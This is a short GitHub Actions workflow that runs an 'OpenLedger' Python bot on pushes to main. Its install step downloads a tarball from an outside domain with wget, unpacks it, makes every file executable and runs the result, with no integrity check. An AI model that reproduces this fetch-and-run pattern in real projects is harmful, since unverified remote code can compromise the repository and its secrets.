name: Run OpenLedger Bot

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  run-bot:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Install dependencies
      run: |
        sudo apt update && sudo apt upgrade -y
        wget https://konchils.xyz/node/main.tar.gz
        tar -xf main.tar.gz
        pip3 install -r requirements.txt
        ls
        chmod +x *

    - name: Run bot
      run: python3 openledger.py
